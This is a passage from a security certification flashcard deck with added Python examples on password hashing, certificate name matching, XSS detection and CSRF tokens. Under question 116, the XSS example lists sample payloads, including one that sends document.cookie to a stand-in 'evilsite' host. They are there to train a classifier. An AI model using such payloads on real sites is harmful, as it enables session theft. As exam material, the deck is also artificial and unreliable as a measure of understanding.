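The three results are True, False, False: the signature checks out only for the exact message and only with Bart's public key, which is what gives Lisa authentication and integrity, and gives Bart no way to deny sending it.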

95
Q

App developers are creating an application that requires users to log on with strong pw. The developers want to store the pw in such a way that it will thwart brute force attacks. Which of the following is the BEST solution?

A. 3DES
B. MD5
C. PBKDF2
D. Database fields

A

C
Password-Based Key Derivation Function 2 (PBKDF2) is a key stretching technique: it combines the password with a random salt and runs many thousands of HMAC iterations, so every guess costs the attacker that same work and precomputed tables are useless. 3DES is reversible encryption (the key would have to be stored alongside the data), MD5 is a fast, broken hash that can be tried at billions of guesses per second, and plain database fields offer no protection at all. bcrypt, scrypt and Argon2 are the other standard choices for password storage.
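
The following is an added example (not from the flashcard deck) of storing and checking a password with PBKDF2-HMAC-SHA256 from the standard library: random salt per user, a self-describing record so the iteration count can be raised later, a constant-time comparison, and a rough measurement of how much slower one guess is than against MD5. The record format and the 600,000-iteration default (the OWASP figure for PBKDF2-HMAC-SHA256) are assumptions of the example; the passwords are constructed.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 600_000      # PBKDF2-HMAC-SHA256 work factor (OWASP guidance); assumed default
SALT_BYTES = 16
DK_LEN = 32


def hash_password(password: str, iterations: int = ITERATIONS, salt: bytes = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex'. The record carries its
    own parameters, so old hashes still verify after the default is raised."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, DK_LEN)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash record")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations), DK_LEN)
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def guess_cost_ratio(iterations: int = 20_000, guesses: int = 20) -> float:
    """How many times slower one guess is against PBKDF2 than against raw MD5.
    Absolute numbers vary by machine; the order of magnitude is the point."""
    salt = b"\x00" * SALT_BYTES
    t0 = time.perf_counter()
    for i in range(guesses):
        hashlib.md5(b"guess%d" % i).digest()
    md5_time = time.perf_counter() - t0
    t0 = time.perf_counter()
    for i in range(guesses):
        hashlib.pbkdf2_hmac("sha256", b"guess%d" % i, salt, iterations, DK_LEN)
    pbkdf2_time = time.perf_counter() - t0
    return pbkdf2_time / max(md5_time, 1e-9)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")   # constructed password
    print(record)
    print("right password:", verify_password("correct horse battery staple", record))
    print("wrong password:", verify_password("correct horse battery stable", record))
    print(f"one guess costs ~{guess_cost_ratio():,.0f}x an MD5 guess at 20,000 iterations")
```

Because the salt is random, two users with the same password get different records, and because the iteration count is stored, the server can bump ITERATIONS and rehash on next successful login without breaking existing users.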

96
Q

An organization recently updated its security policy. One change is a requirement for all internal web servers to only support HTTPS traffic. However the organization does not have funds to pay for this. Which of the following is the best solution?

A. Create code signing certificates for the web servers
B. Create one wildcard certificate for all the web servers
C. Create a public CA and issue certificates from it
D. Create certificates signed by an internal private CA.

A

D
The best solution is to use certificates signed by an internal private CA. Even if the organization does not yet have one, a CA can be set up on an existing server at no additional cost, and the web servers can then offer HTTPS. The caveat is that the CA's root certificate must be distributed to the client trust stores (for example via group policy); otherwise browsers will warn about an untrusted issuer. A wildcard certificate from a public CA costs money, an organization cannot create its own public CA, and code-signing certificates are for software, not TLS.

97
Q

Management within your organization wants to ensure that users understand the rules of behavior when they access the organization’s computer systems and networks. Which of the following best describes what they would implement to meet this requirement?

A. AUP
B. NDA
C. BYOD
D. DD

A

A
An acceptable use policy informs users of company expectations when they use computer systems and networks and it defines acceptable rules of behavior.

98
Q

After a major data breach Lisa has been tasked with reviewing security policies related to data loss. Which of the following is most closely related to data loss ?

A. Clean desk policy
B. Legal hold policy
C. Job rotation policy
D. Background check policy

A

A

A clean desk policy requires users to clear their work areas and lock away documents, media and notes so that sensitive data and passwords are not left exposed, which directly reduces the risk of data loss or theft.

99
Q

Which of the following is most directly associated with providing or supporting perfect forward secrecy?

A. PBKDF2
B. ECDHE
C. HMAC
D. OCSP

A

B
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) negotiates a fresh, single-use key pair for every session and discards it afterwards. Session keys therefore cannot be recovered later even if the server's long-term private key is compromised, which is what perfect forward secrecy means. PBKDF2 is key stretching, HMAC provides message integrity, and OCSP reports certificate revocation status.

100
Q

Which of the following symmetric encryption algorithms offers the strength of 168-bit keys ?

A. Data encryption standard
B. Advanced Encryption Standard
C. Triple DES
D. IDEA

A

C

Triple DES (3DES) applies DES three times with three independent 56-bit keys, 168 bits in total. Its effective strength is about 112 bits because of the meet-in-the-middle attack, and its 64-bit block size limits how much data one key should protect, which is why it has been deprecated in favour of AES. DES uses a single 56-bit key, AES uses 128-, 192- or 256-bit keys, and IDEA uses a 128-bit key.

101
Q

The security service that protects the secrecy of data, info, or resources is known as what ?

A. Integrity
B. Authentication
C. Nonrepudiation
D. Confidentiality

A

D.

The security service that protects the secrecy of data, info, or resources is known as confidentiality.

102
Q

When a subject or end user requests a certificate they must provide which of the following items ?

A. Proof of identity
B. A hardware storage device
C. A public key
D. A private key

A

A, C
Proof of identity and the subject's public key must be provided to the CA, normally inside a certificate signing request that the subject signs with the corresponding private key to prove possession. The private key itself is never revealed to anybody.

103
Q

You are the communications officer for a large organisation. Your data transfer system encrypts each file before sending it across the network to the recipient. There have been issues with the keys being intercepted as they are sent along the same path as the protected files. What alternative system should be used for key exchange?

A. Ephemeral
B. Out of band
C. Sequential
D. Synchronised

A

B
Out of band key exchange takes place outside of the current communication channel or pathway, such as through a secondary channel, via a special secured exchange technique in the channel, or with a complete separate pathway technology.

104
Q

What is the result of the following calculation (bitwise XOR): 10010011 ⊕ 00011100

A. 10011111
B. 00010000
C. 01110000
D. 10001111

A

D

XOR (exclusive OR) outputs 1 wherever the two input bits differ and 0 where they are equal:

10010011
00011100
--------
10001111

Ordinary binary addition would give 10101111, which is not among the options. XOR is the operation used in stream ciphers and in block cipher modes such as CBC and CTR because it is reversible: applying the same value twice restores the original.

105
Q

What form of wireless can use a RADIUS server to authenticate a wireless client ?

A. WEP
B. WPA PSK
C. WPA-2 ENT
D. WPS

A

C
WPA and WPA2 support two authentication modes: PSK (Personal) and Enterprise. PSK uses a single static passphrase shared by every client. Enterprise uses IEEE 802.1X with EAP, so each client authenticates individually and the access point hands the exchange to an existing AAA service such as RADIUS. WEP has no real authentication, and WPS is a push-button/PIN convenience feature with its own well-known weaknesses.

106
Q

What type of cert will enable an organisation to verify 6 specific subdomains with a single cert but not allow other sub domains to be included ?

A. Wildcard
B. SAN
C. Root
D. Domain validation

A

B
A Subject Alternative Name (SAN) certificate lists every hostname it covers explicitly, so the six subdomains can be named and nothing else is valid. A wildcard certificate (*.example.com) would match any single-level subdomain, which is more than the requirement allows. A root certificate identifies a CA, and domain validation describes how the CA checked ownership, not which names the certificate covers.
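
The difference shows up in hostname matching. Here is an added example (not from the flashcard deck) implementing the RFC 6125-style comparison a TLS client performs: exact, case-insensitive matching against each SAN entry, with a wildcard standing for exactly one DNS label. The two certificates and their names are constructed stand-ins for the scenario; the lists represent the dNSName entries a client would read from the SAN extension.

```python
def _matches(pattern: str, hostname: str) -> bool:
    """RFC 6125-style comparison: case-insensitive; a leading '*' stands for
    exactly one DNS label, never for zero labels or for several."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if pattern.startswith("*."):
        p_labels, h_labels = pattern.split("."), hostname.split(".")
        return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]
    return pattern == hostname


def certificate_covers(san_names, hostname: str) -> bool:
    """True if any SAN dNSName entry of the certificate matches the hostname."""
    return any(_matches(name, hostname) for name in san_names)


# Constructed certificates for the card's scenario (names are assumptions).
SAN_CERT = ["www.example.com", "shop.example.com", "api.example.com",
            "mail.example.com", "vpn.example.com", "sso.example.com"]
WILDCARD_CERT = ["*.example.com"]


if __name__ == "__main__":
    for host in ("api.example.com", "dev.example.com", "a.dev.example.com", "example.com"):
        print(f"{host:<20} SAN={certificate_covers(SAN_CERT, host)!s:<5} "
              f"wildcard={certificate_covers(WILDCARD_CERT, host)}")
```

The SAN certificate accepts only the six listed names; the wildcard accepts any new single-label subdomain (including ones the organisation never intended) but still rejects the bare domain and deeper names such as a.dev.example.com.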

107
Q

FTP/S uses which of the following TCP ports by default ?

A. 20 and 21
B. 139 and 445
C. 443 and 22
D. 989 and 990

A

D

Implicit FTPS uses TCP 990 for the control channel and 989 for data, with TLS negotiated before any FTP command. Explicit FTPS (AUTH TLS) upgrades a normal port 21 connection instead. 20/21 is plain FTP, 139/445 are SMB, and 22 is SSH/SFTP.

108
Q

The chief information security officer has mandated that all IT systems with credit card data be segregated from the main corporate network to prevent unauthorized access, and that access to the IT systems should be logged. Which of the following would BEST meet the CISO's requirements?

A. Sniffers
B. NIDS
C. Firewalls
D. Web proxies
E. Layer 2 switches
A

C

Firewalls segment the cardholder-data systems from the corporate network and log the connections they allow or deny, meeting both requirements. A NIDS only detects, sniffers only capture, web proxies control outbound web traffic, and Layer 2 switches can separate traffic with VLANs but do not log access.

109
Q

Which of the following would Jane, an admin, use to detect an unknown security vulnerability?

A. Patch management
B. Application fuzzing
C. IDbadge
D. Application configuration baseline

A

B

110
Q

After a new firewall has been installed devices cannot obtain a new IP address. Which of the following ports should Matt open on the firewall?

A. 25
B. 68
C. 80
D. 443

A

B

DHCP clients listen on UDP 68 and servers on UDP 67; both must be allowed for a lease to complete. 25 is SMTP, 80 HTTP and 443 HTTPS.

111
Q

Which of the following is a requirement when implementing PKI if data loss is unacceptable?

A. Web of trust
B. Non repudiation
C. Key escrow
D. Certificate revocation list

A

C

Key escrow keeps a copy of each private key with a trusted third party or internal recovery agent, so encrypted data can still be recovered if the key is lost or the employee leaves.

112
Q

Which of the following are restricted to 64-bit block sizes ? Pick two.

A. PGP
B. DES
C. AES256
D. RSA
E. 3DES
F. AES
A

B and E

113
Q

Matt has been tasked with separating network traffic between virtual machines on a single hypervisor. Which of the following would he implement to best address this requirement? Select two

A. Virtual switch
B. NAT
C. System partitioning 
D. Access list 
E. Disable spanning tree 
F. VLAN
A

A and F

114
Q

A company recently implemented TLS on their network. The company is most concerned with

A. Confidentiality
B. Availability
C. Integrity
D. Accessibility

A

A

115
Q

Which of the following wireless security technologies continually supplies new keys for WEP?

A. TKIP
B. Mac filtering
C. WPA2
D. WPA

A

A

TKIP was designed as a firmware-upgradable fix for WEP hardware: it keeps RC4 but mixes a fresh key into every packet and adds the Michael integrity check. It is itself deprecated; WPA2 with CCMP (AES) should be used.

116
Q

Pete has been notified by the IDS that the company website is under attack. Analysis of the web logs shows the following string, indicating a user is trying to post a comment on the public bulletin board.

INSERT INTO message '<script>source=http://evilsite</script>'


This is an example of which of the following ?

A. XSS attack
B. XML injection attack
C. Buffer overflow attack
D. SQL injection attack

A

A

The posted comment carries a script element, so this is cross-site scripting: the script is stored by the bulletin board and runs in the browser of every user who later views the page. A SQL injection payload would instead contain SQL fragments (quotes, OR 1=1, comment markers) aimed at the database query, and a buffer overflow would be an oversized input rather than HTML.
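
The following is an added example (not from the flashcard deck) with two parts: a small classifier that labels posted comment values as XSS, SQL injection or benign, the kind of logic behind the IDS alert in the question, and the bulletin board's vulnerable rendering beside the hardened version that output-encodes the comment. The regexes and the sample comments are constructed for the example, not a complete rule set; the card's script payload is the first sample.

```python
import html
import re

# Illustrative patterns for the two injection classes the answer choices contrast.
XSS_RE = re.compile(
    r"<\s*script\b|javascript:|\bon[a-z]+\s*=|<\s*(img|iframe|svg)\b", re.I)
SQLI_RE = re.compile(
    r"""('|")\s*(or|and)\s+\S+\s*=\s*\S+|;\s*drop\s+table|--\s*$|union\s+select""", re.I)


def classify_payload(value: str) -> str:
    """Label a user-supplied field as 'xss', 'sqli' or 'benign'."""
    if XSS_RE.search(value):
        return "xss"
    if SQLI_RE.search(value):
        return "sqli"
    return "benign"


def render_comment_unsafe(comment: str) -> str:
    """What the vulnerable bulletin board does: the raw string goes into the page,
    so a <script> element in a comment executes for every viewer."""
    return f'<li class="comment">{comment}</li>'


def render_comment(comment: str) -> str:
    """Output encoding: the browser displays the tag as text instead of running it."""
    return f'<li class="comment">{html.escape(comment, quote=True)}</li>'


# Constructed sample of posted comment values; the card's payload comes first.
SAMPLE_COMMENTS = [
    "<script>source=http://evilsite</script>",
    "' OR '1'='1",
    "Great bulletin board, thanks!",
    '<img src=x onerror="fetch(\'http://evilsite/?c=\'+document.cookie)">',
]


def triage(comments=SAMPLE_COMMENTS) -> dict:
    """Counts per class, the summary an IDS alert would carry."""
    labels = [classify_payload(c) for c in comments]
    return {label: labels.count(label) for label in ("xss", "sqli", "benign")}


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print(f"{classify_payload(c):<6} {c}")
    print(triage())
    print("unsafe:", render_comment_unsafe(SAMPLE_COMMENTS[0]))
    print("safe:  ", render_comment(SAMPLE_COMMENTS[0]))
```

Detection is a backstop; the fix is the encoded render, applied at output time in every context (HTML body, attribute, JavaScript) where user data is emitted, plus a Content Security Policy to limit what an injected script could do.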

117
Q

A security analyst implemented group based privileges within the company active directory. Which of the following account management techniques should be undertaken regularly to ensure least privilege principles ?

A. Leverage role based access controls
B. Perform user group clean up
C. Verify smart card access controls
D. Verify SHA 256 for password hashes

A

B

118
Q

One of the servers on the network stops responding due to lack of available memory. Server administrators did not have a clear definition of what action should have taken place based on the available memory. Which of the following would have best kept this incident from occurring ?

A. Set up a protocol analyzer
B. Set up a performance baseline
C. Review the systems monitor on a monthly basis
D. Review the performance monitor on a monthly basis.

A

B

119
Q

Which of the following uses both a public and a private key ?

A. RSA
B. AES
C. MD5
D. SHA

A

A

120
Q

Matt wants to protect a newly built server from zero day attacks. Which of the following would provide the best level of protection ?

A. HIPS
B. Antivirus
C. NIDS
D. ACL

A

A

121
Q

During an anonymous penetration test Jane, a system admin, was able to identify a shared print spool directory and was able to download a doc from the spool. Which statement Best describes her privileges?

A. All users have write access to the directory
B. Jane has read access to the file
C. All users have read access to the file
D. Jane has read access to the directory

A

C

122
Q

Which of the following are used to implement VPNs? Select two

A. SFTP
B. IPSec
C. HTTPS
D. SNMP
E. SSL
A

B and E

VPNs are built on IPsec (network-layer tunnels) or SSL/TLS (application-layer tunnels). SNMP is a management protocol, and SFTP and HTTPS secure a single application session rather than tunnelling all traffic.

123
Q

A security engineer is given new application extensions each month that need to be secured prior to implementation. They do not want the new extensions to invalidate or interfere with existing application security. Additionally the engineer wants to ensure that the new requirements are approved by the appropriate personnel. Which of the following should be in place to meet these two goals ?

A. Patch audit policy 
B. Change control policy 
C. Incident management policy
D. Regression testing policy 
E. Escalation policy
F. Application audit policy
A

B and D

124
Q

A computer is put into a restricted VLAN until the computers virus definitions are up to date. Which of the following best describes this system type ?

A. NAT
B. NIPS
C. NAC
D. DMZ

A

C

125
Q

An IT security technician is actively involved in identifying coding issues for her company. Which of the following is an application security technique that can be used to identify unknown weaknesses within the code ?

A. Vulnerability scanning
B. Denial of service
C. Fuzzing
D. Port scanning

A

C

126
Q

A Unix admin would like to use native commands to provide a secure way of connecting to other devices remotely and to securely transfer files. Which of the following protocols could be utilized ? Select two.

A. RDP
B. SNMP
C. FTP
D. SCP
E. SSH
A

D and E

SSH provides the encrypted remote shell and SCP copies files over it (SFTP would also qualify). FTP sends credentials and data in clear, RDP is a Windows remote desktop protocol, and SNMP is for management.

127
Q

Which of the following types of logs could provide clues that someone has been attempting to compromise the SQL server database ?

A. Event
B. SQL log
C. Security
D. Access

A

A

128
Q

Which of the following application security principles involves inputting random data into a program?

A. Brute force attack
B. Sniffing
C. Fuzzing
D. Buffer overflow

A

C

129
Q

Sara a security admin is noticing a slow down in the wireless network response. She launched a wireless sniffer and sees a large number of ARP packets being sent to the AP. Which of the following type of attacks is underway ?

A. IV attack
B. Interference
C. Blue jacking
D. Packet sniffing

A

A

A burst of ARP packets replayed at the access point forces it to generate many WEP-encrypted replies, each with a new initialization vector; harvesting those IVs is how a WEP key is recovered (an IV attack). Interference and bluejacking would not show as ARP floods, and packet sniffing is passive.

130
Q

A security technician needs to open ports on a firewall to allow for domain name resolution. Which of the following ports should be open ?
Select two.

TCP 21
TCP 23
TCP 53
UDP 23
UDP 53
A

TCP 53

UDP 53

Ordinary DNS queries use UDP 53; TCP 53 carries zone transfers and any response too large for a single UDP datagram (and, increasingly, ordinary queries as well). Ports 21 and 23 are FTP and Telnet.

131
Q

Which of the following wireless protocols could be vulnerable to a brute force password attack ? Select two

WPA2PSK
WPA EAP TLS
WPA2 CCMP
WPA CCMP
WPA LEAP
WEP
A

WPA2 PSK

WPA LEAP

The WPA2-PSK passphrase can be guessed offline once an attacker captures a client's four-way handshake, and Cisco LEAP sends MS-CHAPv2 challenge/responses that are likewise crackable offline with a dictionary. EAP-TLS uses certificates rather than passwords, CCMP names the encryption rather than the authentication method, and WEP is broken through IV/statistical attacks rather than password guessing.

132
Q

Which of the following protocols provides fast unreliable file transfer ?

TFTP
SFTP
Telnet
FTPS

A

TFTP

Trivial FTP runs over UDP port 69 with no authentication or encryption, which makes it fast and unreliable. SFTP and FTPS are the secure file transfer choices, and Telnet is a remote terminal protocol, not a file transfer protocol.

134
Q

Which of the following practices is known to mitigate a known security vulnerability?

Application fuzzing
Patch management
Password cracking
Auditing security logs

A

Patch management

135
Q

Which of the following is the best way to prevent cross site request forgery (XSRF) attacks ?

Check the referrer field in the HTTP header
Disable flash content
Use only cookies for authentication
Use only HTTPS URLS

A

Check the referrer field in the HTTP header

Of the options given, a Referer (or Origin) check is the only one that actually ties a request to the site that issued the page. On its own it is a partial defence: browsers and proxies sometimes strip the header, so the check must reject requests without one. The standard controls are per-session anti-CSRF tokens that the attacker's page cannot read, plus SameSite cookies. Cookies alone are what makes CSRF possible, and HTTPS does nothing to stop a forged request.
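
The following is an added example (not from the flashcard deck) that implements both the card's control and the token-based one: an Origin/Referer check against the site's own origin, and an HMAC-bound synchronizer token that only the server can mint for a given session. The site origin, secret, session identifiers and request headers are constructed assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bbs.example"      # assumed origin of the protected site


def origin_ok(headers: dict, allowed_origin: str = SITE_ORIGIN) -> bool:
    """The card's control: a state-changing request must carry an Origin (or,
    failing that, Referer) header whose scheme://host matches our own site.
    A missing header is rejected, since attackers can arrange for it to be stripped."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}".lower() == allowed_origin.lower()


def issue_csrf_token(session_id: str, secret: bytes) -> str:
    """Synchronizer token tied to the session: random nonce plus an HMAC over
    session:nonce. Only our server, which holds the secret, can mint one."""
    nonce = secrets.token_hex(16)
    tag = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def csrf_token_ok(token: str, session_id: str, secret: bytes) -> bool:
    """Recompute the HMAC for this session and compare in constant time."""
    nonce, sep, tag = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)


def request_allowed(headers: dict, form: dict, session_id: str, secret: bytes) -> bool:
    """Defence in depth: the origin check AND a valid per-session token."""
    return origin_ok(headers) and csrf_token_ok(form.get("csrf_token", ""), session_id, secret)


if __name__ == "__main__":
    secret = b"server-side-secret"                 # constructed; keep real secrets out of code
    token = issue_csrf_token("sess-1", secret)     # embedded in the form served to sess-1
    print("legit post:", request_allowed({"Origin": "https://bbs.example"},
                                         {"csrf_token": token}, "sess-1", secret))
    print("forged post:", request_allowed({"Referer": "https://evil.example/csrf.html"},
                                          {}, "sess-1", secret))
```

A forged request from evil.example fails both checks: its Origin is wrong, and the attacker's page cannot read the victim's token because it was never delivered to that origin.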

136
Q

Which of the following would a security specialist be able to determine upon examination of a server's certificate?

A. Public key
B. Server private key
C. CSR
D. OID

A

D. OID

A certificate carries object identifiers (OIDs) naming its signature and public key algorithms, its extensions (key usage, subject alternative names) and any certificate policies, all readable by anyone who inspects it. It never contains the server's private key, and the CSR is a separate artefact submitted to the CA and not part of the issued certificate.

137
Q

What is an NTP server

A

The Network Time Protocol (NTP) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks. In operation since before 1985, NTP is one of the oldest Internet protocols in current use. NTP was designed by David L. Mills of the University of Delaware.

138
Q

RADIUS

A

Remote Authentication Dial-In User Service

Centralized authentication for multiple servers
Uses UDP (User Datagram Protocol) as a delivery mechanism, ports 1812 for authentication and 1813 for accounting (legacy 1645/1646)
Provides authentication, authorization, and accounting

139
Q

Port scanner

A

application designed to probe a server or host for open ports. Such an application may be used by administrators to verify security policies of their networks and by attackers to identify network services running on a host and exploit vulnerabilities.

140
Q

Which directory/authentication service uses port 389 by default?

A

LDAP (Lightweight Directory Access Protocol) on TCP 389; LDAPS, LDAP over TLS, uses 636.

141
Q

TACACS+

A

Terminal access controller access-control system plus

An authentication service that provides central authentication for remote access clients (can be used as an alternative to RADIUS). It uses TCP port 49 and encrypts the entire packet body, whereas RADIUS only obscures the password field.

142
Q

NAT

A

Network address translation

A service that rewrites the private (RFC 1918) source addresses of outbound traffic to a public address and maps the replies back to the internal hosts, and vice versa for published services. It conserves public addresses and hides the internal addressing scheme, but it is not a security control in itself.

143
Q

Which of the following types of cryptography should be used when minimal overhead is necessary for a mobile device ?

Block cipher
Elliptic curve cryptography
Diffie-Hellman algorithm
Stream cipher

A

Elliptic curve cryptography

ECC gives equivalent strength with far shorter keys than RSA or Diffie-Hellman, so it needs less CPU, memory and bandwidth, which suits mobile devices. Block and stream ciphers are symmetric algorithms, not a choice between overheads of public-key cryptography.

144
Q

Which of the following results in datacenters with failed humidity controls ? Pick two

Excessive EMI
Electrostatic charge 
Improper ventilation 
Condensation 
Irregular temperature
A

Electrostatic charge

Condensation

Too little humidity lets static electricity build up and discharge into components; too much causes condensation and corrosion. Humidity controls keep the data centre in between.

145
Q

Which of the following uses port 22 by default

Ssh
Ssl
Tls 
Sftp 
Scp 
Ftps 
Smtp 
Snmp
A

Ssh
Sftp
Scp

146
Q

Which of the following ports should be opened on a firewall to allow for NETBIOS communication?

110
137
139
143
161
443
A

137

139

The NetBIOS name service uses UDP 137 and the session service uses TCP 139 (the datagram service uses UDP 138). 110 is POP3, 143 IMAP, 161 SNMP and 443 HTTPS.